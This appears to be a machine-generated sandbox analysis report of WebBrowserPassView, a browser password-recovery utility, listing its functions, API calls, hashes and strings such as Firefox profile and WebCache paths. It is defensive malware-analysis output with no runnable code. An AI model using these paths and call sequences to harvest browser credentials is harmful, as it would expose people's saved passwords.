Opcode ID: 7ee771b16487d39b61153e4239614bb8b6a0fcb54c4a807fbe838d5fcbd2a04a
Instruction ID: b1b9f3cced5a7470729646768e957e6b9d6e833cd164865aec5624d5e78815e5
Opcode Fuzzy Hash: 7ee771b16487d39b61153e4239614bb8b6a0fcb54c4a807fbe838d5fcbd2a04a
Instruction Fuzzy Hash: BF4134B294121CAADB20EB56DC81FCF777CAF85314F1144ABB508F2142E6795B84CF6A

Uniqueness

Uniqueness Score: -1.00%

Function 004167D1 Relevance: 10.6, APIs: 7, Instructions: 61libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 0040AE2A: memset.MSVCRT ref: 0040AE4A
Part of subcall function 0040AE2A: GetSystemDirectoryW.KERNEL32(C:\Windows\system32,00000104), ref: 0040AE67
Part of subcall function 0040AE2A: wcscpy.MSVCRT ref: 0040AE7A
Part of subcall function 0040AE2A: wcscat.MSVCRT ref: 0040AE90
Part of subcall function 0040AE2A: LoadLibraryW.KERNELBASE(00000000), ref: 0040AEA1
Part of subcall function 0040AE2A: LoadLibraryW.KERNEL32(?), ref: 0040AEAA

GetProcAddress.KERNEL32(00000000,00000000), ref: 004167FF
GetProcAddress.KERNEL32(00000000,00000000), ref: 00416810
GetProcAddress.KERNEL32(00000000,00000000), ref: 00416821
GetProcAddress.KERNEL32(00000000,00000000), ref: 00416832
GetProcAddress.KERNEL32(00000000,00000000), ref: 00416843
GetProcAddress.KERNEL32(00000000,00000000), ref: 00416854
GetProcAddress.KERNEL32(00000000,00000000), ref: 00416865

Memory Dump Source

Source File: 00000001.00000002.286286663.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.286279372.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286333427.000000000044F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286346596.000000000045A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286358011.000000000045E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286365350.0000000000474000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_WebBrowserPassView.jbxd

Yara matches

Similarity

API ID: AddressProc$LibraryLoad$DirectorySystemmemsetwcscatwcscpy
String ID:
API String ID: 2941347001-0
Opcode ID: 6c7181999001807cf19655f7a5c886da2927c02d6c206d7826a88d8cf07677d3
Instruction ID: 405c2e4babdb8952247d8a080dcda94cd63fb6e5d2decb1bec32cb30ddcbd491
Opcode Fuzzy Hash: 6c7181999001807cf19655f7a5c886da2927c02d6c206d7826a88d8cf07677d3
Instruction Fuzzy Hash: 911124B0504744AEF6207F72DD0BE277AA5EF41B14F11483EF0965A8E1DB7AA8608F24

Uniqueness

Uniqueness Score: -1.00%

Function 0041A2D6 Relevance: 9.1, APIs: 6, Instructions: 140fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNELBASE(?,-7FBE6346,00000003,00000000,?,?,00000000), ref: 0041A3AE
CreateFileA.KERNEL32(?,-7FBE6346,00000003,00000000,00419C3A,00419C3A,00000000), ref: 0041A3C6
GetLastError.KERNEL32 ref: 0041A3D5
free.MSVCRT(?), ref: 0041A3E2

Memory Dump Source

Source File: 00000001.00000002.286286663.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.286279372.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286333427.000000000044F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286346596.000000000045A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286358011.000000000045E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286365350.0000000000474000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_WebBrowserPassView.jbxd

Yara matches

Similarity

API ID: CreateFile$ErrorLastfree
String ID:
API String ID: 77810686-0
Opcode ID: 3837423018413e79f1a8055628a625645689c72852c8b795b1528378839c1df6
Instruction ID: c70e6a76c9c0c16949b2d84360e4fde80b94c386b4f0d6e6335da104fa2cc62f
Opcode Fuzzy Hash: 3837423018413e79f1a8055628a625645689c72852c8b795b1528378839c1df6
Instruction Fuzzy Hash: DE4135B15093059FE720DF25DC4178BBBE4EF84324F14892EF8A482291D378D9A88B97

Uniqueness

Uniqueness Score: -1.00%

Function 00412F8E Relevance: 9.1, APIs: 4, Strings: 2, Instructions: 57COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00412FAA
memset.MSVCRT ref: 00412FBF

Part of subcall function 00416B94: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00416BCE

Part of subcall function 00409CD8: wcslen.MSVCRT ref: 00409CD9
Part of subcall function 00409CD8: wcscat.MSVCRT ref: 00409CF1

wcscat.MSVCRT ref: 00412FE8

Part of subcall function 00416B94: memset.MSVCRT ref: 00416BED
Part of subcall function 00416B94: RegCloseKey.ADVAPI32(004148A8,?,?,?,?,?,00000000), ref: 00416C54
Part of subcall function 00416B94: wcscpy.MSVCRT ref: 00416C62

wcscat.MSVCRT ref: 00413011

Strings

Mozilla\Firefox\Profiles, xrefs: 0041300B
Mozilla\Profiles, xrefs: 00412FE2

Memory Dump Source

Source File: 00000001.00000002.286286663.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.286279372.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286333427.000000000044F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286346596.000000000045A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286358011.000000000045E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286365350.0000000000474000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_WebBrowserPassView.jbxd

Yara matches

Similarity

API ID: memsetwcscat$CloseFolderPathSpecialwcscpywcslen
String ID: Mozilla\Firefox\Profiles$Mozilla\Profiles
API String ID: 1534475566-1174173950
Opcode ID: ba6c0ebe88ac952b5c194dcd9fe97a1dc60b886a3a66e04ae42cc6cfcfc4ce36
Instruction ID: 422148556ace2f77c93d77bf435b4c82adbc6076694dfca18b1a60226733ba9e
Opcode Fuzzy Hash: ba6c0ebe88ac952b5c194dcd9fe97a1dc60b886a3a66e04ae42cc6cfcfc4ce36
Instruction Fuzzy Hash: 0801C2B2A4132C65DB207B228C86ECB732C9F45758F0144BBB504E7143D9788DC88AA9

Uniqueness

Uniqueness Score: -1.00%

Function 00403C78 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 119COMMON

Download Yara Rule

APIs

Part of subcall function 00408D81: free.MSVCRT(00000000,004124C5,/deleteregkey,/savelangfile,?,?,?,?,00000002,?,00446AC4,00000000,?,0000000A), ref: 00408D88

Part of subcall function 00413F68: memset.MSVCRT ref: 00413FEF
Part of subcall function 00413F68: wcsrchr.MSVCRT ref: 00414007

memset.MSVCRT ref: 00403D7B
memcpy.MSVCRT ref: 00403D94
wcscmp.MSVCRT ref: 00403DC0
_wcsicmp.MSVCRT ref: 00403DFD

Strings

, xrefs: 00403CA3

Memory Dump Source

Source File: 00000001.00000002.286286663.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.286279372.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286333427.000000000044F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286346596.000000000045A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286358011.000000000045E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286365350.0000000000474000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_WebBrowserPassView.jbxd

Yara matches

Similarity

API ID: memset$_wcsicmpfreememcpywcscmpwcsrchr
String ID:
API String ID: 2758756878-3916222277
Opcode ID: 86d052ae708fb1be17ff2d385b546714b6cc9c000aacad6c9d693117b8ff7004
Instruction ID: 3324fc85694a20c99f30ee3fab2bb6b3f261583d23399c464f958340e94e5838
Opcode Fuzzy Hash: 86d052ae708fb1be17ff2d385b546714b6cc9c000aacad6c9d693117b8ff7004
Instruction Fuzzy Hash: 6D415C716083858ED730DF25C845A8FB7E8EFC6314F504D2FE48893681DB7899498B57

Uniqueness

Uniqueness Score: -1.00%

Function 00416B94 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 77registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00416AE7: GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathW), ref: 00416B0A

SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00416BCE
memset.MSVCRT ref: 00416BED
RegCloseKey.ADVAPI32(004148A8,?,?,?,?,?,00000000), ref: 00416C54
wcscpy.MSVCRT ref: 00416C62

Part of subcall function 0040A2A9: GetVersionExW.KERNEL32(0045E340,0000001A,00416BB5,?,00000000), ref: 0040A2C3

Strings

Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, xrefs: 00416C08, 00416C18

Memory Dump Source

Source File: 00000001.00000002.286286663.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.286279372.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286333427.000000000044F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286346596.000000000045A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286358011.000000000045E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286365350.0000000000474000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_WebBrowserPassView.jbxd

Yara matches

Similarity

API ID: AddressCloseFolderPathProcSpecialVersionmemsetwcscpy
String ID: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
API String ID: 71295984-2036018995
Opcode ID: 8c20b169bd282f672307cfd0e33e5ead9d42bdd278c07b69ec96e2cf80f58d4a
Instruction ID: cef4cdc2aa1c6a3535febfa580eefb1bb336ec347ee4d762a3996ce24f9a1629
Opcode Fuzzy Hash: 8c20b169bd282f672307cfd0e33e5ead9d42bdd278c07b69ec96e2cf80f58d4a
Instruction Fuzzy Hash: 16110B31901224AADB24B35D9C4D9EF736CDB01308F6204ABE805A2152E628EEC586DE

Uniqueness

Uniqueness Score: -1.00%

Function 00416312 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 43COMMON

Download Yara Rule

APIs

wcschr.MSVCRT ref: 0041632C
_snwprintf.MSVCRT ref: 00416351
WritePrivateProfileStringW.KERNEL32(?,?,?,004552B8), ref: 0041636F
GetPrivateProfileStringW.KERNEL32 ref: 00416387

Strings

"%s", xrefs: 00416340

Memory Dump Source

Source File: 00000001.00000002.286286663.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.286279372.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286333427.000000000044F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286346596.000000000045A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286358011.000000000045E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286365350.0000000000474000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_WebBrowserPassView.jbxd

Yara matches

Similarity

API ID: PrivateProfileString$Write_snwprintfwcschr
String ID: "%s"
API String ID: 1343145685-3297466227
Opcode ID: 3aaa40ebdc19578b97ff3075b960e6db10c6f9077613310ec93345511b7ae3b9
Instruction ID: 6e1343c4dc7dbf7023b058b03300c33d8cf364170467c751c5f20a7e8d9ce334
Opcode Fuzzy Hash: 3aaa40ebdc19578b97ff3075b960e6db10c6f9077613310ec93345511b7ae3b9
Instruction Fuzzy Hash: 3A018B3240421EBBEF219F40DC05FEA3B6AFF05304F048065BD24901A1D33AC565DB99

Uniqueness

Uniqueness Score: -1.00%

Function 004156F1 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27libraryloadertimeCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(kernel32.dll,?,004158EF,?,?,?,00000000,?,00000000,?), ref: 00415702
GetProcAddress.KERNEL32(00000000,GetProcessTimes), ref: 0041571C
GetProcessTimes.KERNELBASE(00000000,?,00000000,?,?,?,004158EF,?,?,?,00000000,?,00000000,?), ref: 0041573F

Strings

kernel32.dll, xrefs: 004156FD
GetProcessTimes, xrefs: 0041570C

Memory Dump Source

Source File: 00000001.00000002.286286663.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.286279372.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286333427.000000000044F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286346596.000000000045A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286358011.000000000045E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286365350.0000000000474000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_WebBrowserPassView.jbxd

Yara matches

Similarity

API ID: AddressHandleModuleProcProcessTimes
String ID: GetProcessTimes$kernel32.dll
API String ID: 1714573020-3385500049
Opcode ID: cc6b767486beea88798ecaabffb4101cb485a2642c9037223f23588e5dcb7f65
Instruction ID: a8c3bf7ddc1ca0b25540cafbdac30c397c85bf92067745488bba3609cc165c05
Opcode Fuzzy Hash: cc6b767486beea88798ecaabffb4101cb485a2642c9037223f23588e5dcb7f65
Instruction Fuzzy Hash: 4DF01C75140708EFDB019FA4FD06BA63BA4EB48342F044075B91CD2562D776C9A8DF5A

Uniqueness

Uniqueness Score: -1.00%

Function 00445E0F Relevance: 7.7, APIs: 1, Strings: 4, Instructions: 219COMMON

Download Yara Rule

APIs

memcpy.MSVCRT ref: 00445EC0

Strings

BINARY, xrefs: 00445F29, 00445F2E, 00445F3A, 00445F46, 00445F6B
NOCASE, xrefs: 00445F83
RTRIM, xrefs: 00445F52
no such vfs: %s, xrefs: 00445F0A

Memory Dump Source

Source File: 00000001.00000002.286286663.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.286279372.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286333427.000000000044F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286346596.000000000045A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286358011.000000000045E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286365350.0000000000474000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_WebBrowserPassView.jbxd

Yara matches

Similarity

API ID: memcpy
String ID: BINARY$NOCASE$RTRIM$no such vfs: %s
API String ID: 3510742995-3177411277
Opcode ID: 1165683c971d253af972ad931778c34b410deae4bfcb81e51aa8cc138b68385f
Instruction ID: 74b0bd9825c19e6685264d1484a235018c45777622f8ba0ce628bc876c866ef4
Opcode Fuzzy Hash: 1165683c971d253af972ad931778c34b410deae4bfcb81e51aa8cc138b68385f
Instruction Fuzzy Hash: 03710A71604701BFE710AF16CCC1EA6B7A8BB05318F15452FF41897383DB79E8958BAA

Uniqueness

Uniqueness Score: -1.00%

Function 004210FD Relevance: 7.7, APIs: 3, Strings: 2, Instructions: 165COMMON

Download Yara Rule

APIs

memcmp.MSVCRT ref: 0042115A
memcmp.MSVCRT ref: 00421185
memcmp.MSVCRT ref: 004211F1

Strings

SQLite format 3, xrefs: 00421178
@ , xrefs: 004211EB

Memory Dump Source

Source File: 00000001.00000002.286286663.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.286279372.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286333427.000000000044F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286346596.000000000045A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286358011.000000000045E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286365350.0000000000474000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_WebBrowserPassView.jbxd

Yara matches

Similarity

API ID: memcmp
String ID: @ $SQLite format 3
API String ID: 1475443563-3708268960
Opcode ID: 637f62bee6550b69d90550379ef7f2363dd965a9b2d4ce58cbe17c4226d1441a
Instruction ID: 8a8e30af19285e6602da34aa628d26869ae88a683b6dca71fc9513d498463ada
Opcode Fuzzy Hash: 637f62bee6550b69d90550379ef7f2363dd965a9b2d4ce58cbe17c4226d1441a
Instruction Fuzzy Hash: A451F271A00225DBDB10DFA9D8817AAB7F4EF64314F55019BE804EB256D778EE01CBA8

Uniqueness

Uniqueness Score: -1.00%

Function 00410C23 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 68COMMON

Download Yara Rule

APIs

_wcsicmp.MSVCRT ref: 00410C44
qsort.MSVCRT ref: 00410CEE

Strings

/sort, xrefs: 00410C3F
/nosort, xrefs: 00410CA4

Memory Dump Source

Source File: 00000001.00000002.286286663.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.286279372.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286333427.000000000044F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286346596.000000000045A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286358011.000000000045E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286365350.0000000000474000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_WebBrowserPassView.jbxd

Yara matches

Similarity

API ID: _wcsicmpqsort
String ID: /nosort$/sort
API String ID: 1579243037-1578091866
Opcode ID: c07a100eaa3c38faba3df5a66cb89ab60920950fe83399008d8303a833aca2b3
Instruction ID: 144d33eed54290a6f9744a9a5dbcb7717411fe56fc34cf4e9986f4238599fcc7
Opcode Fuzzy Hash: c07a100eaa3c38faba3df5a66cb89ab60920950fe83399008d8303a833aca2b3
Instruction Fuzzy Hash: F221F8707006019FE318AB36C981E96B3A9FF95314B11026FE4259B291DBB5BCD18BDD

Uniqueness

Uniqueness Score: -1.00%

Function 00406CF9 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 66COMMON

Download Yara Rule

APIs

Part of subcall function 0040B7F7: wcslen.MSVCRT ref: 0040B804
Part of subcall function 0040B7F7: free.MSVCRT(0045B4C0,00000000,00000000,?,?,?,6n@,00406D1D,6n@,00000000,?,?,00406E36,00000000,-00000002,0040702A), ref: 0040B827
Part of subcall function 0040B7F7: free.MSVCRT(0045B4BC,00000000,00000000,?,?,?,6n@,00406D1D,6n@,00000000,?,?,00406E36,00000000,-00000002,0040702A), ref: 0040B84A
Part of subcall function 0040B7F7: memcpy.MSVCRT ref: 0040B86E

memset.MSVCRT ref: 00406D33
WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,00000FFF,00000000,00000000,00406E36,00000000,-00000002,0040702A,00000000), ref: 00406D4C

Part of subcall function 0040B6F7: strlen.MSVCRT ref: 0040B6FE
Part of subcall function 0040B6F7: free.MSVCRT(00000000,00000FFF,00000000,00406D5E,?), ref: 0040B721
Part of subcall function 0040B6F7: free.MSVCRT(00000FFF,00000000,00406D5E,?), ref: 0040B752
Part of subcall function 0040B6F7: memcpy.MSVCRT ref: 0040B77F

free.MSVCRT(?), ref: 00406D73

Strings

6n@, xrefs: 00406D0D

Memory Dump Source

Source File: 00000001.00000002.286286663.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.286279372.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286333427.000000000044F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286346596.000000000045A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286358011.000000000045E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286365350.0000000000474000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_WebBrowserPassView.jbxd

Yara matches

Similarity

API ID: free$memcpy$ByteCharMultiWidememsetstrlenwcslen
String ID: 6n@
API String ID: 832090674-1376077705
Opcode ID: 54479ce15e440bb149d53c2abbc7b093be4f2da72d99af89ca78a096c42e0ab3
Instruction ID: ecbed58b480fc252fdf2742d1a2ea52a83645ae883cc2f402a8ff7b73a586809
Opcode Fuzzy Hash: 54479ce15e440bb149d53c2abbc7b093be4f2da72d99af89ca78a096c42e0ab3
Instruction Fuzzy Hash: 0D219371904258BFDB209B59EC40CA937ACEB46329F11807BF855A7393D734DD448BA8

Uniqueness

Uniqueness Score: -1.00%

Function 0040C34B Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 61COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 0040C36D
memset.MSVCRT ref: 0040C387

Part of subcall function 00416B94: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00416BCE

Part of subcall function 0040A2DE: wcslen.MSVCRT ref: 0040A2E8
Part of subcall function 0040A2DE: wcslen.MSVCRT ref: 0040A2F2
Part of subcall function 0040A2DE: wcscpy.MSVCRT ref: 0040A306
Part of subcall function 0040A2DE: wcscat.MSVCRT ref: 0040A314

Part of subcall function 0040A157: GetFileAttributesW.KERNELBASE(?,0040DF98,?,0040E04F,00000000,?,00000000,00000208,?), ref: 0040A15B

Strings

Microsoft\Windows\WebCache\WebCacheV01.dat, xrefs: 0040C3A5
Microsoft\Windows\WebCache\WebCacheV24.dat, xrefs: 0040C3CD

Memory Dump Source

Source File: 00000001.00000002.286286663.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.286279372.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286333427.000000000044F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286346596.000000000045A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286358011.000000000045E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286365350.0000000000474000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_WebBrowserPassView.jbxd

Yara matches

Similarity

API ID: memsetwcslen$AttributesFileFolderPathSpecialwcscatwcscpy
String ID: Microsoft\Windows\WebCache\WebCacheV01.dat$Microsoft\Windows\WebCache\WebCacheV24.dat
API String ID: 2887208581-2114579845
Opcode ID: 394c4c75fa7beffb2d5a2aa385abc5dc66d0e768d5be117711317e139cb40491
Instruction ID: 3131e6838cf381c5c62b3ff9a3a8967ade7f88a79be8704d85ddc64b4c2fe5ff
Opcode Fuzzy Hash: 394c4c75fa7beffb2d5a2aa385abc5dc66d0e768d5be117711317e139cb40491
Instruction Fuzzy Hash: A51137B2D8021CA6EB10E761DC86FDB77ACAB14308F1105B7BD04F51C3E6B89ED84699

Uniqueness

Uniqueness Score: -1.00%

Function 0044E1A7 Relevance: 6.0, APIs: 4, Instructions: 25COMMON

Download Yara Rule

APIs

??3@YAXPAX@Z.MSVCRT ref: 0044E1B1
??3@YAXPAX@Z.MSVCRT ref: 0044E1C1
??3@YAXPAX@Z.MSVCRT ref: 0044E1D1
??3@YAXPAX@Z.MSVCRT ref: 0044E1E1

Memory Dump Source

Source File: 00000001.00000002.286286663.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.286279372.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286333427.000000000044F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286346596.000000000045A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286358011.000000000045E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286365350.0000000000474000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_WebBrowserPassView.jbxd

Yara matches

Similarity

API ID: ??3@
String ID:
API String ID: 613200358-0
Opcode ID: 5880488c387e208958e704af83ad7f491bfac2cc684ba48dba1bfd6cff0e72e7
Instruction ID: 0040574f82d095680108ff298768a764fab42f46883a413dd34ad4582741df14
Opcode Fuzzy Hash: 5880488c387e208958e704af83ad7f491bfac2cc684ba48dba1bfd6cff0e72e7
Instruction Fuzzy Hash: 46E0197130120006BE2CEB3FA981A2223CC2E61301319883AF900C2282CF28E980802E

Uniqueness

Uniqueness Score: -1.00%

Function 0043C798 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 967COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 0043C7DB
memset.MSVCRT ref: 0043CB84

Strings

only a single result allowed for a SELECT that is part of an expression, xrefs: 0043C86A

Memory Dump Source

Source File: 00000001.00000002.286286663.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.286279372.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286333427.000000000044F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286346596.000000000045A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286358011.000000000045E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286365350.0000000000474000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_WebBrowserPassView.jbxd

Yara matches

Similarity

API ID: memset
String ID: only a single result allowed for a SELECT that is part of an expression
API String ID: 2221118986-1725073988
Opcode ID: b3be54a25f95d4426186d96762bdc05463f7e7b5d4954b2f9a60bb8f93d58d58
Instruction ID: d119b0dec74e9b19e5a25435855cd8d11ca1b6cc1a1ec524576f73f373bec87f
Opcode Fuzzy Hash: b3be54a25f95d4426186d96762bdc05463f7e7b5d4954b2f9a60bb8f93d58d58
Instruction Fuzzy Hash: 05827A71A00218AFDF25DF69C881AAE7BB1FF08318F14511AFD15A7292D77AEC41CB94

Uniqueness

Uniqueness Score: -1.00%

Function 0040D540 Relevance: 5.1, APIs: 4, Instructions: 51COMMON

Download Yara Rule

APIs

??2@YAPAXI@Z.MSVCRT ref: 0040D57A
??2@YAPAXI@Z.MSVCRT ref: 0040D598
??2@YAPAXI@Z.MSVCRT ref: 0040D5B6
??2@YAPAXI@Z.MSVCRT ref: 0040D5D4

Memory Dump Source

Source File: 00000001.00000002.286286663.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.286279372.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286333427.000000000044F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286346596.000000000045A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286358011.000000000045E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286365350.0000000000474000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_WebBrowserPassView.jbxd

Yara matches

Similarity

API ID: ??2@
String ID:
API String ID: 1033339047-0
Opcode ID: 9e807e9980987f70bb2a73660c85433d145fa0dd07df9d2969b3cf11719032c3
Instruction ID: 0e0a047154a33720e6f2f45df11e84489cdf12d838f6504bc1093cfb551ce4d4
Opcode Fuzzy Hash: 9e807e9980987f70bb2a73660c85433d145fa0dd07df9d2969b3cf11719032c3
Instruction Fuzzy Hash: F70171B26023005EFB5EDB3AED07B2D66A0EB48311F04453EE602CD1F6EEB5D6408B08

Uniqueness

Uniqueness Score: -1.00%

Function 0041691E Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 108COMMON

Download Yara Rule

APIs

Part of subcall function 004167D1: GetProcAddress.KERNEL32(00000000,00000000), ref: 004167FF
Part of subcall function 004167D1: GetProcAddress.KERNEL32(00000000,00000000), ref: 00416810
Part of subcall function 004167D1: GetProcAddress.KERNEL32(00000000,00000000), ref: 00416821
Part of subcall function 004167D1: GetProcAddress.KERNEL32(00000000,00000000), ref: 00416832
Part of subcall function 004167D1: GetProcAddress.KERNEL32(00000000,00000000), ref: 00416843
